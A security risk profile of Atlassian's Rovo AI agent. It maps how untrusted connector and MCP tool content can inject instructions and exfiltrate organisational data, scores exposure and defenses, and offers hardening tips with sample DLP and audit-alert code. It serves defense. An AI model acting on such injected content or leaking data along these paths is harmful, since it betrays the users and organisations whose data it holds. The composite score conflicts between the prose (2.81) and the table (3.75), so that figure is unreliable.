1 Key Risks
The most critical security risks an operator inherits when deploying this agent in its documented default configuration. In its default configuration, Rovo meets all three trifecta conditions, ships no output-layer DLP, and offers limited visibility into per-agent reasoning activity.
2 AIRQ Scores
The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Rovo's AIRQ composite of 2.81 reflects a constrained-blast agent whose defense controls partially offset a moderate attack surface.
Rovo occupies the Tight Operators quadrant with an attack surface of 4.80, a blast radius of 3.75, and defense controls of 7, each measured against its own axis maximum.
Scores are expressed against axis maximums: attack surface out of 10, blast radius out of 10, defense controls out of 15, and AIRQ composite out of 15.
| Metric | Score | Comments |
|---|---|---|
| AIRQ Score | 3.75 | Low composite indicates constrained overall risk but does not eliminate the need for egress-layer hardening. |
| Blast Radius | 3.75 / 10 | Limited by absence of code execution and deployment access; network and credential scopes are the primary blast factors. |
| Attack Surface | 4.8 / 10 | External data ingestion, persistent memory, inter-agent MCP surface, and open configuration drive the score; trifecta-complete is met. |
| Defense Controls | 7 / 15 | Vendor publishes permission scoping, execution isolation, and audit logging but documents no output-layer DLP or content-exfiltration controls. |
3 Attack Surface
Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. Rovo's reasoning loop ingests user prompts, Confluence and Jira content, connected third-party application data, and MCP server tool responses as first-class input.
Higher scores indicate surfaces where untrusted content reaches the reasoning loop with minimal validation; the highest scores here fall on External Data, Memory, Inter-Agent, and Configuration.
Each row maps a named attack surface to its assessed score and a one-sentence comment identifying the specific exposure vector.
| Surface | Score | Comments |
|---|---|---|
| User Input | 2 / 4 | Chat prompts and slash commands are the primary user-input channel with an instruction hierarchy separating system and user tiers [8]. |
| External Data | 3 / 4 | Third-party connectors sync content from Confluence, Jira, and external applications into the reasoning loop without per-document injection filtering [6]. |
| Memory | 3 / 4 | Persistent cross-session memory stores preferences and organizational knowledge via the Teamwork Graph without documented integrity verification [13]. |
| Reasoning | 2 / 4 | Multi-model architecture routes to OpenAI and Anthropic providers with visible chain-of-thought but no published independent reasoning-loop audit [5]. |
| Planning | 2 / 4 | Multi-step skill plans are visible before execution with confirmation gates for destructive operations on the default configuration [8]. |
| Tool Execution | 2 / 4 | Skills execute scoped API calls within Atlassian products and connected services with no arbitrary code execution exposed to end users [8]. |
| Orchestration | 2 / 4 | Rovo Studio automation rules invoke agents on triggers within a single user permission scope without cross-agent escalation [12]. |
| Inter-Agent | 3 / 4 | MCP server connectivity extends the agent to external tool providers without inter-agent authentication; CVE-2026-27826 demonstrated injection via the ecosystem server [1][2][3]. |
| Output Processing | 2 / 4 | Responses render in the Atlassian UI with permission-scoped visibility but no documented URL sanitization or exfiltration blocking [5]. |
| Configuration | 3 / 4 | Admins enable MCP servers and marketplace agents; any licensed user can create custom Rovo agents by default without additional approval [11]. |
The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Rovo accepts content from connected applications and MCP tool responses, operates over organizational data in Jira and Confluence, and transmits context to external LLM providers and MCP endpoints.
Atlassian Rovo exhibits all three of these conditions in its documented default configuration:
- Untrusted input — Connected third-party apps and MCP server tool responses feed attacker-controllable content into the reasoning loop without per-document filtering [6][11].
- Sensitive data — The agent operates with the invoking user's full permission scope across Jira issues, Confluence pages, and OAuth-scoped integrations [7].
- External egress — Prompt context flows to third-party LLM providers and outbound MCP skill invocations reach external endpoints [5][11].
4 Blast Radius
The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A compromised Rovo session reaches the invoking user's Jira and Confluence content, connected OAuth integrations, and triggered automation flows but not code execution or deployment infrastructure.
Higher blast scores indicate factors where a compromised agent session can reach sensitive resources beyond the immediate chat interaction.
Each row maps a blast-radius factor to its score and identifies the specific workflow boundary or OAuth scope that defines the exposure.
| Factor | Score | Comments |
|---|---|---|
| Code execution | 1 / 4 | No shell, sandbox, or arbitrary code execution is exposed to end users; all operations are API-call-based skills [8]. |
| File system access | 1 / 4 | Read-only access scoped to Confluence pages and Jira attachments within the invoking user's permission boundary [7]. |
| Network access | 2 / 4 | Outbound connections are domain-restricted to Atlassian services, configured MCP servers, and LLM provider endpoints [5]. |
| Credential access | 2 / 4 | The agent inherits OAuth scopes from connected integrations via the invoking user's permission set without per-action credential gating [7]. |
| Autonomous action | 2 / 4 | Automation rules in Rovo Studio fire on triggers and schedules; individual skill invocations within a triggered flow skip per-action confirmation [12]. |
| Deployment access | 1 / 4 | Rovo creates and modifies Jira issues and Confluence pages but has no documented access to infrastructure deployment or production environments [8]. |
5 Defense Controls
Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Atlassian publishes permission scoping, cloud execution isolation, and SOC 2 certified audit logging while leaving output-layer DLP entirely to the operator.
Higher defense scores indicate stronger vendor-implemented safeguards that reduce the operator's residual hardening burden on the default configuration.
Each component is scored on what the vendor implements and documents versus what falls to the operator to configure or build externally.
| Component | Score | Comments |
|---|---|---|
| Input Guardrails | 1 / 3 | Vendor claims content-as-data treatment but publishes no independent red-team validation or pattern-based injection filter specification [4]. |
| Execution Isolation | 2 / 3 | Cloud-hosted multi-tenant isolation with permission-scoped execution; vendor references internal Firecracker microVM usage but publishes no general isolation specification [9]. |
| Action Controls | 2 / 3 | Default configuration requires user confirmation for destructive skills; admin-configurable policies restrict agent creation and MCP server enablement [7]. |
| Output Guardrails | 0 / 3 | No DLP, credential redaction, or exfiltration-blocking mechanism is documented for agent output on the default configuration [6]. |
| Monitoring | 2 / 3 | SOC 2 and ISO 27001 certified platform with structured audit logs and organization-level SIEM-compatible event forwarding [10][14]. |
6 Hardening Tips
Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators should prioritize closing the egress-layer gap and restricting MCP server connectivity to break the trifecta on the default configuration.
Input Guardrails
Input guardrails intercept adversarial content before it reaches the reasoning loop.
- Policy: Require security review of all third-party MCP server connections before admin enablement in production workspaces.
- Configuration: Restrict the approved MCP server list to vendor-vetted entries only via the admin-managed allowlist in Rovo settings.
- Engineering: Deploy a prompt-injection classifier on content from connected third-party apps before it enters the Rovo reasoning context.
Execution Isolation
Execution isolation contains what a compromised agent can do on the host.
- Policy: Mandate that Rovo agents in production workspaces operate under service accounts with least-privilege scopes.
- Configuration: Disable Rovo agent creation for non-admin users via the organization-level governance controls in the admin console.
- Engineering: Instrument API-call boundaries to log every skill invocation with the full request payload for post-incident forensics.
Action Controls
Action controls govern which tools and actions the agent can invoke autonomously.
- Policy: Require explicit approval workflows for automation rules that modify data across multiple products or connected integrations.
- Configuration: Enable mandatory confirmation gates for all write operations in Rovo Studio automation rules regardless of trigger type.
- Engineering: Build a webhook-based approval gateway that intercepts high-blast-radius skill invocations and requires out-of-band confirmation.
Output Guardrails
Output guardrails inspect what the agent sends to other systems and users.
- Policy: Establish a data classification policy identifying content categories that must never appear in agent responses to standard users.
- Configuration: Configure Atlassian Guard to monitor and alert on agent responses containing credential formats or sensitive data markers.
- Engineering: Deploy a DLP proxy between the response pipeline and the user-facing chat interface to redact sensitive content patterns.
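As an added example (not code from this profile or from Atlassian), here is a minimal output guardrail of the kind the Engineering tip describes: it redacts common credential formats and neutralizes markdown links and images that point outside an assumed host allowlist. The allowlist, the credential patterns and the sample response are all constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Credential formats to redact from agent responses before they render.
# Illustrative patterns; the operator's classification policy decides the real set.
CREDENTIAL_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "bearer_token": re.compile(r"\bBearer\s+[A-Za-z0-9\-._~+/]{20,}=*"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b"),
    "private_key": re.compile(
        r"-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----",
        re.DOTALL,
    ),
}

# Markdown links and images. An image whose URL carries response text is fetched
# automatically when the reply renders, so links to unapproved hosts are removed.
MARKDOWN_LINK = re.compile(r"(!?)\[([^\]]*)\]\((https?://[^)\s]+)\)")

# Assumed allowlist of hosts a rendered response may reference (constructed).
ALLOWED_HOST_SUFFIXES = (".atlassian.net", ".atlassian.com")


def _host_allowed(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return host.endswith(ALLOWED_HOST_SUFFIXES)


def filter_response(text: str) -> tuple[str, list[str]]:
    """Return the redacted response and a list of findings for the audit log."""
    findings: list[str] = []
    for name, pattern in CREDENTIAL_PATTERNS.items():
        text, count = pattern.subn(f"[REDACTED:{name}]", text)
        if count:
            findings.append(f"{name}:{count}")

    def _neutralize(match: re.Match) -> str:
        label, url = match.group(2), match.group(3)
        if _host_allowed(url):
            return match.group(0)  # approved host: leave the link untouched
        findings.append(f"blocked_url:{urlparse(url).hostname}")
        return f"{label} [link to unapproved host removed]".strip()

    return MARKDOWN_LINK.sub(_neutralize, text), findings


# Constructed sample response containing a leaked key and a hidden tracking image.
SAMPLE_RESPONSE = (
    "Staging uses AKIAABCDEFGHIJKLMNOP. See [the runbook](https://acme.atlassian.net/wiki/x) "
    "and ![status](https://attacker.example/pixel.png?q=secret)"
)
```

The findings list is what the proxy should write to the audit log, so that a redaction event is visible to the monitoring rules described in the next section.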
Monitoring
Monitoring captures what the agent did and surfaces anomalies for review.
- Policy: Define a retention and review cadence for Rovo audit logs including weekly automated anomaly scans for unusual skill invocations.
- Configuration: Forward organization audit logs to an external SIEM with alert rules for high-volume agent activity and unusual MCP server access.
- Engineering: Build a custom audit dashboard correlating Rovo agent activity with downstream system changes to detect multi-step attack chains.
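As an added example (not part of the profile, and not Atlassian's documented audit log schema), the two alert rules named in the Configuration tip written as detection logic over constructed audit events: access through an MCP server outside the approved list, and a burst of skill invocations by one user inside a sliding time window. The event field names and the allowlist are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed allowlist of MCP servers that admins have approved.
APPROVED_MCP_SERVERS = {"mcp.approved.example"}


def _event(ts, user, skill, mcp_server=None):
    # Assumed event shape: timestamp, invoking user, skill name, MCP server if any.
    return {"ts": ts, "user": user, "skill": skill, "mcp_server": mcp_server}


# Constructed audit events: normal activity for alice, one call routed through an
# unapproved MCP server, and a burst of 25 issue-creation skills by mallory.
EVENTS = [
    _event("2025-01-10T09:00:00", "alice", "search_confluence"),
    _event("2025-01-10T09:02:30", "alice", "fetch_tool_result", "unknown-tools.example"),
] + [
    _event(f"2025-01-10T09:10:{i:02d}", "mallory", "create_jira_issue") for i in range(25)
]


def detect(events, volume_threshold=20, window=timedelta(minutes=5)):
    """Return alerts as (rule, user, detail) tuples."""
    alerts = []

    # Rule 1: any skill routed through an MCP server outside the allowlist.
    for e in events:
        server = e.get("mcp_server")
        if server and server not in APPROVED_MCP_SERVERS:
            alerts.append(("unapproved_mcp_server", e["user"], server))

    # Rule 2: at least volume_threshold invocations by one user inside a sliding window.
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        by_user[e["user"]].append(datetime.fromisoformat(e["ts"]))
    for user, times in by_user.items():
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= volume_threshold:
                alerts.append(("high_volume", user, end - start + 1))
                break  # one alert per user; the SIEM deduplicates repeats
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```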
7 References
The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.
Selected Vulnerabilities
- [1] CVE-2026-27826 - SSRF in the mcp-atlassian MCP server enabling outbound requests to attacker-controlled URLs and LLM tool-result injection; patched in 0.17.0
- [2] GHSA-7r34-79r5-rcc9 - GitHub advisory for unauthenticated SSRF via unvalidated header URLs in mcp-atlassian community MCP server middleware
Selected Research
- [3] MCP Atlassian SSRF analysis - Independent advisory analyzing the chained SSRF-to-prompt-injection path through mcp-atlassian into downstream LLM context
- [4] Can Rovo Be Tricked by Malicious Files? - Atlassian community discussion documenting vendor claims about prompt-injection resistance and content-as-data treatment
Vendor Documentation
- [5] Atlassian AI Trust Center - Primary trust page documenting LLM provider data handling and SOC 2 plus ISO 27001 compliance scope
- [6] Rovo data privacy and usage guidelines - Support documentation covering third-party connector data sync and model provider relationships
- [7] Rovo agent permissions and governance - Documents the permission-scoped execution model and admin controls for agent creation restriction
- [8] Rovo Chat capabilities - Documents default skills requiring user confirmation and the skill-based action model
- [9] Rovo AI Security - Vendor security page covering encryption claims and admin controls for data protection
- [10] Rovo data usage and privacy admin guide - Admin guide documenting audit log access and the LLM provider non-training commitment
Other Sources
- [11] Rovo MCP gallery - Announcement documenting open MCP standard connectivity extending agent reach to third-party services
- [12] Rovo Studio announcement - Documents Rovo Studio multi-agent automation capabilities and enterprise governance controls
- [13] Rovo Chat persistent memory updates - Documents the three-layer persistent memory architecture including Teamwork Graph integration
- [14] Atlassian security practices - Platform security documentation covering SIEM aggregation and automated alert rules